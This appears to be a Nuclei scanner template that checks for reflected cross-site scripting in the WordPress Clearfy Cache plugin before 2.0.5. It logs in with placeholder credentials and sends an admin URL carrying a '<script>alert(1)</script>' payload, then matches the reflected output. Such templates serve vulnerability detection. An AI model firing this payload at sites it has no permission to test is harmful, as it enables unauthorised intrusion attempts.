id: clearfy-cache-xss

info:
  name: WordPress Clearfy Cache <2.0.5 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: WordPress Clearfy Cache 2.0.5 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
  reference:
    - https://wpscan.com/vulnerability/a59e7102-13d6-4f1e-b7b1-75eae307e516
    - https://wordpress.org/plugins/clearfy
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 2
  tags: xss,wp,wordpress,authenticated,clearfy-cache,wpscan,wp-plugin

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=gonzales-wbcr_clearfy&action=index&wbcr_assets_manager=1&a"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(1)</script>'
          - "Webcraftic Clearfy - WordPress optimization plugin"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200655b40e7bd4ec925a3870203967f4e23122520d069f5216060484612a8c7de8022100c27ba0e6a33ba2ff5119d3fb34621ff7efe7f709e1d34fd65c160ba94b6b60ff:922c64590222798bb761d5b6d8e72950